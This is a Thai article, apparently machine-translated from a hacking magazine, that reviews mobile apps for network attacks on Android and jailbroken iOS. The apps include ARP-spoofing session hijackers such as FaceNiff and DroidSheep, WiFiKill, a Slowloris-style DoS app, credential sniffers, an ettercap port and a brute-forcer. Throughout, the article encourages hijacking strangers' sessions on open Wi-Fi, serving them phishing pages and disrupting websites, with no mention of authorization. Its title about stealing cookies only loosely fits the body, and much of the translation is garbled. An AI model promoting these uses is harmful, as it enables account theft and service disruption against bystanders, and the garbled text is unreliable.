วิธีขโมยคุกกี้โดยใช้ wifi วิธีการขโมยคุกกี้ การดมข้อมูลในโปรแกรมอื่น

“สมาร์ทโฟนที่มีเครื่องมือแฮ็กเหรอ? ไม่มีสิ่งนั้น” เราคงจะบอกคุณเมื่อไม่นานมานี้ มีความเป็นไปได้ที่จะเปิดตัวเครื่องมือปกติบางอย่างสำหรับการโจมตี Maemo บางตัวเท่านั้น ขณะนี้เครื่องมือที่คุ้นเคยจำนวนมากได้รับการย้ายไปยัง iOS และ Android และเครื่องมือแฮ็กบางตัวได้รับการเขียนขึ้นเป็นพิเศษสำหรับสภาพแวดล้อมมือถือ สมาร์ทโฟนสามารถแทนที่แล็ปท็อปในการทดสอบการเจาะได้หรือไม่? เราตัดสินใจที่จะตรวจสอบมัน

หุ่นยนต์

Android เป็นแพลตฟอร์มยอดนิยมไม่เพียงแต่สำหรับมนุษย์ธรรมดาเท่านั้น แต่ยังสำหรับคนที่เหมาะสมด้วย จำนวนที่มีประโยชน์ ][-utilities ที่นี่อยู่นอกแผนภูมิ สำหรับสิ่งนี้ เราต้องขอบคุณรากของระบบ UNIX ซึ่งทำให้การย้ายเครื่องมือต่างๆ ไปยัง Android ง่ายขึ้นมาก น่าเสียดายที่ Google ไม่อนุญาตให้บางส่วนเข้าไปใน Play Store ดังนั้นคุณจะต้องติดตั้ง APK ที่เกี่ยวข้องด้วยตนเอง นอกจากนี้ ยูทิลิตี้บางตัวต้องการการเข้าถึงระบบสูงสุด (เช่น ไฟร์วอลล์ iptables) ดังนั้นคุณควรดูแลการเข้าถึงรูทล่วงหน้า ผู้ผลิตแต่ละรายใช้เทคโนโลยีของตนเองที่นี่ แต่การค้นหาคำแนะนำที่จำเป็นนั้นค่อนข้างง่าย ชุด HOWTO ที่ดีถูกรวบรวมโดยทรัพยากร LifeHacker (bit.ly/eWgDlu) อย่างไรก็ตาม หากคุณไม่พบรุ่นใดที่นี่ ฟอรัม XDA-Developers (www.xda-developers.com) จะช่วยคุณเสมอ ซึ่งคุณสามารถค้นหาข้อมูลต่างๆ บนโทรศัพท์ Android แทบทุกรุ่น ไม่ทางใดก็ทางหนึ่งยูทิลิตี้บางตัวที่อธิบายไว้ด้านล่างจะทำงานได้โดยไม่ต้องเข้าถึงรูท

มาเริ่มการตรวจสอบด้วยตัวจัดการแพ็คเกจที่ไม่ธรรมดา นักพัฒนาเรียกมันว่า "ยูทิลิตี้สำหรับผู้ใช้ระดับสูง" และนี่ก็ไม่ไกลจากความจริง หลังจากติดตั้ง BotBrew คุณจะได้รับพื้นที่เก็บข้อมูลซึ่งคุณสามารถดาวน์โหลดเครื่องมือที่คุ้นเคยจำนวนมากที่คอมไพล์สำหรับ Android หนึ่งในนั้นคือ: ล่าม Python และ Ruby สำหรับการรันเครื่องมือมากมายที่เขียนอยู่ในนั้น, tcpdump sniffer และ Nmap Scanner สำหรับการวิเคราะห์เครือข่าย, Git และ Subversion สำหรับการทำงานกับระบบควบคุมเวอร์ชัน และอื่นๆ อีกมากมาย

เครื่องสแกนเครือข่าย

สมาร์ทโฟนที่ไม่เด่นซึ่งต่างจากแล็ปท็อปสามารถใส่ในกระเป๋าเสื้อได้ง่ายและไม่ทำให้เกิดความสงสัย จะมีประโยชน์สำหรับการสำรวจเครือข่าย เราได้กล่าวไปแล้วข้างต้นว่าคุณสามารถติดตั้ง Nmap ได้อย่างไร แต่มีตัวเลือกอื่น PIPS เป็นพอร์ตของเครื่องสแกน Nmap ที่ดัดแปลงมาสำหรับ Android โดยเฉพาะ แม้ว่าจะไม่เป็นทางการก็ตาม ซึ่งหมายความว่าคุณสามารถค้นหาอุปกรณ์ที่ใช้งานบนเครือข่ายได้อย่างรวดเร็ว กำหนดระบบปฏิบัติการโดยใช้ตัวเลือกการพิมพ์ลายนิ้วมือ ทำการสแกนพอร์ต หรือพูดง่ายๆ ก็คือ ทำทุกอย่างที่ Nmap สามารถทำได้

มีปัญหาสองประการในการใช้ Nmap แม้ว่าจะมีพลังทั้งหมดก็ตาม ประการแรกพารามิเตอร์สำหรับการสแกนจะถูกส่งผ่านปุ่มเปิดใช้งานซึ่งคุณไม่เพียงต้องรู้เท่านั้น แต่ยังสามารถป้อนโดยใช้แป้นพิมพ์มือถือที่ไม่สะดวกได้อีกด้วย และประการที่สอง ผลลัพธ์การสแกนในเอาต์พุตคอนโซลไม่ชัดเจนเท่าที่เราต้องการ เครื่องสแกน Fing ไม่มีข้อบกพร่องเหล่านี้ โดยจะสแกนเครือข่ายอย่างรวดเร็ว พิมพ์ลายนิ้วมือ จากนั้นแสดงรายการอุปกรณ์ที่มีอยู่ทั้งหมดในรูปแบบที่ชัดเจน โดยแบ่งตามประเภท (เราเตอร์ เดสก์ท็อป iPhone และอื่นๆ) ในเวลาเดียวกัน สำหรับแต่ละโฮสต์ คุณสามารถดูรายการพอร์ตที่เปิดอยู่ได้อย่างรวดเร็ว ยิ่งกว่านั้นจากที่นี่คุณสามารถเชื่อมต่อเช่นกับ FTP โดยใช้ไคลเอนต์ FTP ที่ติดตั้งในระบบ - สะดวกมาก

เมื่อพูดถึงการวิเคราะห์โฮสต์ที่เฉพาะเจาะจง ยูทิลิตี้ NetAudit เป็นสิ่งที่ขาดไม่ได้ มันทำงานบนอุปกรณ์ Android ใด ๆ (แม้จะไม่ได้รูท) และช่วยให้คุณไม่เพียงแต่ระบุอุปกรณ์บนเครือข่ายได้อย่างรวดเร็ว แต่ยังตรวจสอบอุปกรณ์เหล่านั้นโดยใช้ฐานข้อมูลลายนิ้วมือขนาดใหญ่เพื่อกำหนดระบบปฏิบัติการตลอดจนระบบ CMS ที่ใช้บนเว็บ เซิร์ฟเวอร์ ขณะนี้มีลายนิ้วมือดิจิทัลมากกว่า 3,000 ลายนิ้วมือในฐานข้อมูล

ในทางกลับกัน หากคุณจำเป็นต้องทำงานในระดับที่ต่ำกว่าและตรวจสอบการทำงานของเครือข่ายอย่างรอบคอบ หากไม่มี Net Tools คุณจะไม่สามารถทำได้ นี่เป็นชุดยูทิลิตี้ที่ขาดไม่ได้ในการทำงานของผู้ดูแลระบบซึ่งช่วยให้คุณสามารถวินิจฉัยการทำงานของเครือข่ายที่อุปกรณ์เชื่อมต่ออยู่ได้อย่างสมบูรณ์ แพ็คเกจประกอบด้วยโปรแกรมที่แตกต่างกันมากกว่า 15 ประเภท เช่น ping, Traceroute, ARP, DNS, Netstat, Route

การจัดการจราจร

เครื่องดมกลิ่นที่ใช้ tcpdump จะบันทึกข้อมูลทั้งหมดลงในไฟล์ pcap โดยสุจริต ซึ่งสามารถศึกษาได้โดยใช้ยูทิลิตี้ที่คุ้นเคย เช่น Wireshark หรือ Network Miner เนื่องจากไม่มีการใช้ความสามารถในการโจมตี MITM จึงค่อนข้างเป็นเครื่องมือในการวิเคราะห์การรับส่งข้อมูลของคุณ ตัวอย่างเช่น นี่เป็นวิธีที่ดีในการศึกษาว่าโปรแกรมใดที่ติดตั้งบนอุปกรณ์ของคุณจากแหล่งเก็บข้อมูลที่น่าสงสัยส่งผ่าน

หากเราพูดถึงแอปพลิเคชั่นการต่อสู้สำหรับ Android หนึ่งในที่น่าตื่นเต้นที่สุดคือ FaceNiff ซึ่งใช้การสกัดกั้นและการฉีดเข้าไปในเซสชันเว็บที่ถูกสกัดกั้น ด้วยการดาวน์โหลดแพ็คเกจ APK พร้อมโปรแกรม คุณสามารถเรียกใช้เครื่องมือแฮ็กนี้บนสมาร์ทโฟน Android เกือบทุกเครื่อง และด้วยการเชื่อมต่อกับเครือข่ายไร้สาย ดักจับบัญชีของบริการที่หลากหลาย: Facebook, Twitter, VKontakte และอื่น ๆ - มากกว่าสิบ ทั้งหมด การไฮแจ็กเซสชันจะดำเนินการโดยใช้การโจมตีด้วยการปลอมแปลง ARP แต่การโจมตีจะเกิดขึ้นได้เฉพาะกับการเชื่อมต่อที่ไม่มีการป้องกันเท่านั้น (FaceNiff ไม่สามารถแทรกเข้าไปในการรับส่งข้อมูล SSL) เพื่อลดการไหลของ scriptdis ผู้เขียนได้จำกัดจำนวนเซสชันสูงสุดไว้ที่สามเซสชัน - จากนั้นคุณต้องติดต่อนักพัฒนาเพื่อขอรหัสเปิดใช้งานพิเศษ

หากผู้สร้าง FaceNiff ต้องการเงินเพื่อใช้งาน DroidSheep ก็เป็นเครื่องมือฟรีที่มีฟังก์ชันการทำงานเหมือนกัน จริงอยู่ คุณจะไม่พบชุดแจกจ่ายบนเว็บไซต์อย่างเป็นทางการ (เนื่องจากกฎหมายที่เข้มงวดของเยอรมนีเกี่ยวกับสาธารณูปโภคด้านความปลอดภัย) แต่สามารถพบได้บนอินเทอร์เน็ตโดยไม่มีปัญหาใด ๆ ภารกิจหลักของยูทิลิตี้นี้คือการสกัดกั้นเซสชันเว็บของผู้ใช้ของเครือข่ายโซเชียลยอดนิยมซึ่งใช้งานโดยใช้การปลอมแปลง ARP เดียวกัน แต่มีปัญหากับการเชื่อมต่อที่ปลอดภัย เช่น FaceNiff DroidSheep ปฏิเสธที่จะทำงานกับโปรโตคอล HTTPS อย่างเด็ดขาด

ยูทิลิตี้นี้ยังแสดงให้เห็นถึงความไม่ปลอดภัยของเครือข่ายไร้สายแบบเปิด แต่ในระดับที่แตกต่างกันเล็กน้อย มันไม่ได้สกัดกั้นเซสชันของผู้ใช้ แต่อนุญาตให้การรับส่งข้อมูล HTTP ผ่านตัวเองโดยใช้การโจมตีด้วยการปลอมแปลงและดำเนินการจัดการตามที่ระบุ เริ่มต้นจากการเล่นตลกธรรมดาๆ (แทนที่รูปภาพทั้งหมดบนเว็บไซต์ด้วยใบหน้าเกรียน, พลิกรูปภาพทั้งหมดหรือพูด, แทนที่ผลลัพธ์ของ Google) และจบลงด้วยการโจมตีแบบฟิชชิ่ง เมื่อผู้ใช้ได้รับเพจปลอมของบริการยอดนิยมเช่น facebook.com linkedin.com, vkontakte.ru และอื่น ๆ อีกมากมาย

หากคุณถามว่ายูทิลิตี้แฮ็กใดสำหรับ Android ที่ทรงพลังที่สุด Anti ก็อาจไม่มีคู่แข่ง นี่คือการรวมตัวของแฮ็กเกอร์ตัวจริง หน้าที่หลักของโปรแกรมคือการสแกนขอบเขตเครือข่าย ถัดไป โมดูลต่างๆ เข้าสู่การต่อสู้ด้วยความช่วยเหลือในการใช้งานคลังแสงทั้งหมด ซึ่งรวมถึงการดักฟังการจราจร การโจมตี MITM และการหาประโยชน์จากช่องโหว่ที่พบ จริงอยู่ที่ยังมีข้อเสียอยู่บ้าง สิ่งแรกที่ดึงดูดสายตาของคุณคือการหาประโยชน์จากช่องโหว่นั้นดำเนินการจากเซิร์ฟเวอร์โปรแกรมกลางซึ่งตั้งอยู่บนอินเทอร์เน็ตเท่านั้น ซึ่งส่งผลให้คุณสามารถลืมเป้าหมายที่ไม่มีที่อยู่ IP ภายนอกได้

อุโมงค์จราจร

ตัวจัดการไฟล์ที่รู้จักกันดีตอนนี้อยู่บนสมาร์ทโฟนแล้ว! เช่นเดียวกับในเวอร์ชันเดสก์ท็อปมีระบบปลั๊กอินสำหรับเชื่อมต่อกับไดเร็กทอรีเครือข่ายต่างๆ รวมถึงโหมดสองแผงที่เป็นที่ยอมรับซึ่งสะดวกโดยเฉพาะบนแท็บเล็ต

โอเค แต่คุณจะมั่นใจได้อย่างไรถึงความปลอดภัยของข้อมูลของคุณที่ส่งผ่านเครือข่ายไร้สายแบบเปิด? นอกจาก VPN ที่ Android รองรับตั้งแต่แกะกล่องแล้ว คุณยังสามารถสร้างอุโมงค์ SSH ได้อีกด้วย เพื่อจุดประสงค์นี้ มียูทิลิตี้ SSH Tunnel ที่ยอดเยี่ยม ซึ่งช่วยให้คุณกำหนดเส้นทางการรับส่งข้อมูลของแอปพลิเคชันที่เลือกหรือทั้งระบบโดยรวมผ่านเซิร์ฟเวอร์ SSH ระยะไกล

มักจำเป็นต้องส่งการรับส่งข้อมูลผ่านพร็อกซีหรือ sox และในกรณีนี้ ProxyDroid จะช่วยได้ ง่ายมาก: คุณเลือกการรับส่งข้อมูลแอปพลิเคชันที่คุณต้องการอุโมงค์ และระบุพร็อกซี (รองรับ HTTP/HTTPS/SOCKS4/SOCKS5) หากจำเป็นต้องมีการอนุญาต ProxyDroid ก็รองรับสิ่งนี้เช่นกัน อย่างไรก็ตาม การกำหนดค่าสามารถเชื่อมโยงกับเครือข่ายไร้สายเฉพาะโดยทำการตั้งค่าที่แตกต่างกันสำหรับแต่ละเครือข่าย

เครือข่ายไร้สาย

ตัวจัดการเครือข่ายไร้สายในตัวไม่มีข้อมูลมากนัก หากคุณต้องการรับภาพจุดเข้าใช้งานใกล้เคียงที่สมบูรณ์อย่างรวดเร็ว ยูทิลิตี้ Wifi Analyzer เป็นตัวเลือกที่ยอดเยี่ยม มันจะไม่เพียงแสดงจุดเข้าใช้งานใกล้เคียงทั้งหมด แต่ยังแสดงช่องทางที่ใช้งาน ที่อยู่ MAC และที่สำคัญที่สุดคือประเภทของการเข้ารหัสที่ใช้ (เมื่อเห็นตัวอักษรโลภ “WEP” เราสามารถสรุปได้ว่าการเข้าถึง มีเครือข่ายที่ปลอดภัย) นอกจากนี้ ยูทิลิตี้นี้ยังเหมาะอย่างยิ่งหากคุณต้องการค้นหาตำแหน่งของจุดเข้าใช้งานที่ต้องการด้วยตัวบ่งชี้ความแรงของสัญญาณภาพ

ยูทิลิตี้นี้ตามที่นักพัฒนาระบุไว้จะมีประโยชน์เมื่อเครือข่ายไร้สายเต็มไปด้วยความจุกับไคลเอนต์ที่ใช้ทั้งช่องทางและในขณะนี้จำเป็นต้องมีการเชื่อมต่อที่ดีและการเชื่อมต่อที่เสถียร WiFiKill ช่วยให้คุณสามารถยกเลิกการเชื่อมต่อไคลเอนต์จากอินเทอร์เน็ตได้ไม่ว่าจะเลือกหรือตามเกณฑ์เฉพาะ (เช่น เป็นไปได้ที่จะล้อเลียนสมาชิก Yabloko ทั้งหมด) โปรแกรมเพียงทำการโจมตีด้วยการปลอมแปลง ARP และเปลี่ยนเส้นทางไคลเอนต์ทั้งหมดไปยังตัวเอง อัลกอริธึมนี้ถูกนำไปใช้อย่างโง่เขลาบนพื้นฐานของ iptables นี่คือแผงควบคุมสำหรับเครือข่ายไร้สายฟาสต์ฟู้ด :)

การตรวจสอบแอปพลิเคชันเว็บ

การจัดการคำขอ HTTP จากคอมพิวเตอร์เป็นเรื่องง่าย มียูทิลิตี้และปลั๊กอินของเบราว์เซอร์จำนวนมากสำหรับสิ่งนี้ ในกรณีของสมาร์ทโฟน ทุกอย่างจะซับซ้อนขึ้นเล็กน้อย ตัวสร้างแบบสอบถาม HTTP จะช่วยคุณส่งคำขอ HTTP แบบกำหนดเองพร้อมพารามิเตอร์ที่คุณต้องการ เช่น คุกกี้ที่ต้องการหรือ User-Agent ที่เปลี่ยนแปลง ผลลัพธ์ของคำขอจะแสดงในเบราว์เซอร์มาตรฐาน

หากไซต์ได้รับการป้องกันด้วยรหัสผ่านโดยใช้การตรวจสอบสิทธิ์การเข้าถึงขั้นพื้นฐานคุณสามารถตรวจสอบความน่าเชื่อถือได้โดยใช้ยูทิลิตี้ Router Brute Force ADS 2 เริ่มแรกยูทิลิตี้นี้ถูกสร้างขึ้นเพื่อใช้รหัสผ่านแบบ bruteforce บนแผงผู้ดูแลระบบของเราเตอร์ แต่เป็นที่ชัดเจนว่าสามารถทำได้ ใช้กับทรัพยากรอื่นใดที่มีการป้องกันที่คล้ายคลึงกัน ยูทิลิตี้ใช้งานได้ แต่เห็นได้ชัดว่าหยาบ ตัวอย่างเช่น นักพัฒนาไม่ได้จัดเตรียมการใช้กำลังเดรัจฉาน แต่มีเพียงการใช้พจนานุกรมในการบังคับเดรัจฉานเท่านั้น

แน่นอนคุณเคยได้ยินเกี่ยวกับโปรแกรมที่น่าตื่นเต้นสำหรับการปิดการใช้งานเว็บเซิร์ฟเวอร์เช่น Slowloris หลักการทำงานของมันคือการสร้างและรักษาจำนวนการเชื่อมต่อกับเว็บเซิร์ฟเวอร์ระยะไกลให้ได้มากที่สุด ดังนั้นจึงป้องกันไม่ให้ไคลเอนต์ใหม่เชื่อมต่อกับมัน ดังนั้น AnDOSid จึงเป็นอะนาล็อกของ Slowloris ในอุปกรณ์ Android ของคุณ! ฉันจะบอกความลับแก่คุณว่าการเชื่อมต่อสองร้อยครั้งก็เพียงพอที่จะรับประกันการทำงานที่ไม่เสถียรของทุก ๆ เว็บไซต์ที่สี่ที่ใช้งานเว็บเซิร์ฟเวอร์ Apache และทั้งหมดนี้ - จากโทรศัพท์ของคุณ!

สาธารณูปโภคต่างๆ

เมื่อทำงานกับเว็บแอปพลิเคชันจำนวนมากและวิเคราะห์ตรรกะ เป็นเรื่องปกติที่จะพบข้อมูลที่ส่งในรูปแบบที่เข้ารหัส เช่น Base64 การเข้ารหัสจะช่วยคุณถอดรหัสข้อมูลนี้และดูว่ามีอะไรเก็บไว้ในนั้นบ้าง บางที โดยการแทนที่เครื่องหมายคำพูด เข้ารหัสกลับเข้าไปใน Base64 และแทนที่ใน URL ของไซต์ที่คุณกำลังค้นคว้า คุณจะได้รับข้อผิดพลาดในการสืบค้นฐานข้อมูลที่เป็นเจ้าข้าวเจ้าของ

หากคุณต้องการโปรแกรมแก้ไขเลขฐานสิบหก ก็มีโปรแกรมสำหรับ Android ด้วยเช่นกัน ด้วย HexEditor คุณสามารถแก้ไขไฟล์ใดๆ รวมถึงไฟล์ระบบได้ หากคุณยกระดับสิทธิ์ของโปรแกรมเป็น superuser การทดแทนที่ยอดเยี่ยมสำหรับโปรแกรมแก้ไขข้อความมาตรฐาน ช่วยให้คุณสามารถค้นหาข้อความที่ต้องการและเปลี่ยนแปลงได้อย่างง่ายดาย

การเข้าถึงระยะไกล

เมื่อคุณสามารถเข้าถึงโฮสต์ระยะไกลได้ คุณจะต้องสามารถใช้งานได้ และสำหรับสิ่งนี้ เราต้องการลูกค้า มาเริ่มกันที่ SSH โดยที่ ConnectBot เป็นมาตรฐานโดยพฤตินัยอยู่แล้ว นอกจากอินเทอร์เฟซที่สะดวกสบายแล้ว ยังให้ความสามารถในการจัดระเบียบอุโมงค์ที่ปลอดภัยผ่านการเชื่อมต่อ SSH

โปรแกรมที่มีประโยชน์ที่ช่วยให้คุณเชื่อมต่อกับเดสก์ท็อประยะไกลผ่านบริการ RDP หรือ VNC ฉันดีใจมากที่ลูกค้าทั้งสองรายนี้เป็นหนึ่งเดียว ไม่จำเป็นต้องใช้เครื่องมือที่แตกต่างกันสำหรับ RDP และ VNC

เบราว์เซอร์ MIB ที่เขียนขึ้นเป็นพิเศษสำหรับ Android ซึ่งคุณสามารถจัดการอุปกรณ์เครือข่ายโดยใช้โปรโตคอล SNMP อาจมีประโยชน์สำหรับการพัฒนาเวกเตอร์การโจมตีบนเราเตอร์ต่างๆ เนื่องจากสตริงชุมชนมาตรฐาน (หรืออีกนัยหนึ่งคือรหัสผ่านการเข้าถึง) สำหรับการจัดการผ่าน SNMP ยังไม่ได้ถูกยกเลิก

ไอโอเอส

แพลตฟอร์ม iOS ได้รับความนิยมไม่น้อยในหมู่นักพัฒนายูทิลิตี้ความปลอดภัย แต่หากในกรณีของสิทธิ์รูทของ Android นั้นจำเป็นสำหรับบางแอพพลิเคชั่นเท่านั้น การเจลเบรคบนอุปกรณ์ Apple ก็แทบจะทุกครั้ง โชคดีแม้สำหรับเฟิร์มแวร์ iDevices ล่าสุด (5.1.1) ก็มีเครื่องมือเจลเบรกอยู่แล้ว นอกจากการเข้าถึงแบบเต็มรูปแบบแล้ว คุณยังได้รับโปรแกรมจัดการแอปพลิเคชันทางเลือก Cydia ซึ่งมียูทิลิตี้มากมายอยู่แล้ว

การทำงานกับระบบ

สิ่งแรกที่ฉันต้องการเริ่มต้นคือการติดตั้งเทอร์มินัล ด้วยเหตุผลที่ชัดเจน แพ็คเกจระบบปฏิบัติการมือถือมาตรฐานไม่รวมอยู่ในแพ็คเกจ แต่เราจำเป็นต้องใช้มันเพื่อเรียกใช้ยูทิลิตี้คอนโซลซึ่งเราจะหารือเพิ่มเติม การใช้งานเทอร์มินัลอีมูเลเตอร์ที่ดีที่สุดคือ MobileTerminal ซึ่งรองรับหลายเทอร์มินัล ท่าทางควบคุม (เช่น สำหรับการส่ง Control-C) และโดยทั่วไปแล้วมีความรอบคอบในด้านความรอบคอบ

อีกทางเลือกที่ซับซ้อนกว่าในการเข้าถึงคอนโซลของอุปกรณ์คือการติดตั้ง OpenSSH บนอุปกรณ์นั้น (ทำได้ผ่าน Cydia) และเชื่อมต่อกับคอนโซลภายในเครื่องผ่านไคลเอนต์ SSH หากคุณใช้ไคลเอนต์ที่เหมาะสมเช่น iSSH ซึ่งมีการควบคุมหน้าจอสัมผัสที่น่าทึ่ง วิธีนี้สะดวกกว่าการใช้ MobileTerminal อีกด้วย

การสกัดกั้นข้อมูล

เมื่อคุณสามารถเข้าถึงคอนโซลได้แล้ว คุณสามารถลองใช้ยูทิลิตีได้ เริ่มต้นด้วย Pirni ซึ่งลงไปในประวัติศาสตร์ในฐานะนักดมกลิ่นที่เต็มเปี่ยมสำหรับ iOS น่าเสียดายที่โมดูล Wi-Fi ที่มีโครงสร้างจำกัดซึ่งติดตั้งอยู่ในอุปกรณ์ไม่สามารถเปลี่ยนเป็นโหมดที่หลากหลายซึ่งจำเป็นสำหรับการสกัดกั้นข้อมูลตามปกติ ดังนั้นในการสกัดกั้นข้อมูล จึงมีการใช้การปลอมแปลง ARP แบบคลาสสิก โดยการรับส่งข้อมูลทั้งหมดจะถูกส่งผ่านตัวอุปกรณ์เอง ยูทิลิตี้เวอร์ชันมาตรฐานเปิดตัวจากคอนโซล โดยที่นอกเหนือจากพารามิเตอร์การโจมตี MITM แล้ว ยังมีการระบุชื่อของไฟล์ PCAP ซึ่งการรับส่งข้อมูลทั้งหมดจะถูกบันทึกไว้ ยูทิลิตี้นี้มีเวอร์ชันขั้นสูงกว่า - Pirni Pro ซึ่งมีอินเทอร์เฟซแบบกราฟิก ยิ่งไปกว่านั้น มันสามารถแยกวิเคราะห์การรับส่งข้อมูล HTTP ได้ทันทีและยังดึงข้อมูลที่น่าสนใจออกมาโดยอัตโนมัติ (เช่น การเข้าสู่ระบบและรหัสผ่าน) โดยใช้นิพจน์ทั่วไปที่ระบุไว้ในการตั้งค่า

Intercepter-NG นักดมกลิ่นที่รู้จักกันดีซึ่งเราได้เขียนไว้หลายครั้งเพิ่งมีเวอร์ชันคอนโซล ตามที่ผู้เขียนกล่าวไว้ โค้ดส่วนใหญ่เขียนด้วย ANSI C ล้วนๆ ซึ่งมีพฤติกรรมเหมือนกันในเกือบทุกสภาพแวดล้อม ดังนั้นเวอร์ชันคอนโซลจึงทำงานได้ตั้งแต่เริ่มต้นทั้งบนเดสก์ท็อป Windows, Linux และ BSD และบนแพลตฟอร์มมือถือ รวมถึง iOS และระบบปฏิบัติการ Android เวอร์ชันคอนโซลใช้รหัสผ่านที่ส่งผ่านโปรโตคอลที่หลากหลายอยู่แล้ว โดยสกัดกั้นข้อความโต้ตอบแบบทันที (ICQ/Jabber และอื่นๆ อีกมากมาย) รวมถึงการกู้คืนไฟล์จากการรับส่งข้อมูล (HTTP/FTP/IMAP/POP3/SMTP/SMB) ในขณะเดียวกันก็มีฟังก์ชันการสแกนเครือข่ายและ ARP Poison คุณภาพสูงให้เลือกใช้ เพื่อการทำงานที่ถูกต้อง คุณต้องติดตั้งแพ็คเกจ libpcap ผ่าน Cydia ก่อน (อย่าลืมเปิดใช้งานแพ็คเกจการพัฒนาในการตั้งค่า) คำแนะนำการเริ่มต้นทั้งหมดครอบคลุมถึงการตั้งค่าสิทธิ์ที่ถูกต้อง: chmod +x intercepter_ios ถัดไป หากคุณเรียกใช้การดมกลิ่นโดยไม่มีพารามิเตอร์ อินเทอร์เฟซ Itercepter แบบโต้ตอบที่ชัดเจนจะปรากฏขึ้น เพื่อให้คุณสามารถเริ่มการโจมตีใดๆ ได้

มันยากที่จะเชื่อ แต่ในที่สุดเครื่องมือที่ซับซ้อนสำหรับการโจมตี MITM ก็ถูกย้ายไปยัง iOS ในที่สุด หลังจากทำงานอย่างหนัก เราก็สามารถสร้างพอร์ตเคลื่อนที่ได้อย่างเต็มรูปแบบ เพื่อช่วยตัวเองจากการเต้นกับแทมบูรีนที่ต้องพึ่งพาระหว่างการรวบรวมตัวเอง จะเป็นการดีกว่าถ้าติดตั้งแพ็คเกจที่สร้างไว้แล้วโดยใช้ Cydia หลังจากเพิ่ม theworm.altervista.org/cydia (พื้นที่เก็บข้อมูล TWRepo) เป็นแหล่งข้อมูลแล้ว ชุดนี้ยังรวมถึงยูทิลิตี้ etterlog ซึ่งช่วยในการดึงข้อมูลที่เป็นประโยชน์ประเภทต่างๆ จากการถ่ายโอนข้อมูลที่รวบรวมไว้ (เช่น บัญชีการเข้าถึง FTP)

การวิเคราะห์เครือข่ายไร้สาย

ใน iOS เวอร์ชันเก่า ช่างฝีมือใช้ aircrack และอาจทำลายคีย์ WEP ได้ แต่เราตรวจสอบแล้ว: โปรแกรมไม่ทำงานบนอุปกรณ์ใหม่ ดังนั้นในการศึกษา Wi-Fi เราจะต้องพอใจกับสแกนเนอร์ Wi-Fi เท่านั้น ตัววิเคราะห์ WiFi วิเคราะห์และแสดงข้อมูลเกี่ยวกับเครือข่าย 802.11 ที่มีอยู่ทั้งหมดรอบตัวคุณ รวมถึงข้อมูลเกี่ยวกับ SSID ช่องทาง ผู้จำหน่าย ที่อยู่ MAC และประเภทการเข้ารหัส ยูทิลิตี้นี้สร้างกราฟภาพแบบเรียลไทม์ตามข้อมูลที่ปรากฏบนอากาศ ด้วยโปรแกรมดังกล่าว จึงสามารถค้นหาตำแหน่งทางกายภาพของจุดนั้นได้ง่ายหากคุณลืมมันกะทันหัน และตัวอย่างเช่น ดูที่ WPS PIN ซึ่งจะเป็นประโยชน์ในการเชื่อมต่อ

เครื่องสแกนเครือข่าย

ผู้ทดสอบการเจาะใช้โปรแกรมใดทั่วโลก โดยไม่คำนึงถึงเป้าหมายและวัตถุประสงค์ เครื่องสแกนเครือข่าย และในกรณีของ iOS นี่น่าจะเป็นชุดเครื่องมือ Scany ที่ทรงพลังที่สุด ด้วยชุดยูทิลิตี้ในตัวคุณจึงสามารถรับภาพโดยละเอียดของอุปกรณ์เครือข่ายและตัวอย่างเช่นพอร์ตที่เปิดอยู่ได้อย่างรวดเร็ว นอกจากนี้ แพ็คเกจนี้ยังมียูทิลิตี้การทดสอบเครือข่าย เช่น ping, Traceroute, nslookup

อย่างไรก็ตาม หลายคนชอบ Fing สแกนเนอร์มีฟังก์ชันที่ค่อนข้างเรียบง่ายและจำกัด แต่ก็เพียงพอแล้วสำหรับการทำความรู้จักกับเครือข่ายโรงอาหารเป็นครั้งแรก :) ผลลัพธ์จะแสดงข้อมูลเกี่ยวกับบริการที่มีอยู่บนเครื่องระยะไกล ที่อยู่ MAC และชื่อโฮสต์ที่เชื่อมต่อกับเครือข่ายที่สแกน

ดูเหมือนทุกคนจะลืม Nikto แล้ว แต่ทำไมล่ะ? ท้ายที่สุด คุณสามารถติดตั้งเครื่องสแกนช่องโหว่บนเว็บนี้ ซึ่งเขียนด้วยภาษาสคริปต์ (เช่น Perl) ผ่านทาง Cydia ได้อย่างง่ายดาย ซึ่งหมายความว่าคุณสามารถเปิดใช้งานบนอุปกรณ์ที่ถูกเจลเบรคจากเทอร์มินัลได้อย่างง่ายดาย Nikto ยินดีที่จะให้ข้อมูลเพิ่มเติมแก่คุณเกี่ยวกับแหล่งข้อมูลบนเว็บที่ได้รับการทดสอบ นอกจากนี้ คุณสามารถเพิ่มลายเซ็นการค้นหาของคุณเองลงในฐานข้อมูลความรู้ได้ด้วยมือของคุณเอง

เครื่องมืออันทรงพลังสำหรับการหาช่องโหว่ของ SQL โดยอัตโนมัติเขียนด้วยภาษา Python ซึ่งหมายความว่าเมื่อคุณติดตั้งล่ามแล้ว คุณจะสามารถใช้งานได้โดยตรงจากอุปกรณ์มือถือของคุณ

การควบคุมระยะไกล

อุปกรณ์เครือข่ายจำนวนมาก (รวมถึงเราเตอร์ราคาแพง) ได้รับการจัดการโดยใช้โปรโตคอล SNMP ยูทิลิตี้นี้ช่วยให้คุณสามารถสแกนเครือข่ายย่อยสำหรับบริการ SNMP ที่มีอยู่ด้วยค่าสตริงชุมชนที่รู้จักล่วงหน้า (หรืออีกนัยหนึ่งคือรหัสผ่านมาตรฐาน) โปรดทราบว่าการค้นหาบริการ SNMP ด้วยสตริงชุมชนมาตรฐาน (สาธารณะ/ส่วนตัว) เพื่อพยายามเข้าถึงการจัดการอุปกรณ์เป็นส่วนสำคัญของการทดสอบการเจาะระบบ ควบคู่ไปกับการระบุขอบเขตและการระบุบริการ

ยูทิลิตี้สองรายการจากผู้ผลิตรายเดียวกันได้รับการออกแบบมาเพื่อเชื่อมต่อกับเดสก์ท็อประยะไกลโดยใช้โปรโตคอล RDP และ VNC มียูทิลิตี้ที่คล้ายกันมากมายใน App Store แต่สิ่งเหล่านี้คือสิ่งที่ใช้งานง่ายเป็นพิเศษ

การกู้คืนรหัสผ่าน

โปรแกรมในตำนานที่ช่วยให้แฮกเกอร์หลายล้านคนทั่วโลก "จดจำ" รหัสผ่านของพวกเขาได้ถูกส่งไปยัง iOS แล้ว ตอนนี้คุณสามารถค้นหารหัสผ่านสำหรับบริการต่างๆ เช่น HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 และอื่นๆ อีกมากมายได้โดยตรงจาก iPhone ของคุณ จริงอยู่ เพื่อการโจมตีที่มีประสิทธิภาพยิ่งขึ้น ควรตุนพจนานุกรมกำลังเดรัจฉานดีๆ ไว้จะดีกว่า

